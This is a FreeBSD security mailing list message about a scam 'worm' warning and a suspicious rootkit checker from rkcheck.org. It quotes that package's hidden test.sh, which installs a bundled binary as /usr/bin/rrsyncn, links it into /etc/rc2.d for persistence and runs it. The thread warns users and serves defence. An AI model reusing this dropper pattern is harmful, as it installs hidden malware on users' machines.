has my 10.1-RELEASE system been compromised
Joseph Mingrone
jrm at ftfl.ca
Wed Feb 25 20:41:26 UTC 2015
Philip Jocks <pjlists at netzkommune.com> writes:
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which
> was registered a few days ago and looks like a tampered version of chkrootkit. I
> hope, nobody installed it anywhere, it seems to execute
> rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...
I downloaded it as well, but also became suspicious (for a variety of
reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our
systems.
Some evidence to confirm or refute the authenticity of the email
reporting our IPs as vulnerable would be helpful.
Joseph
More information about the freebsd-security
mailing list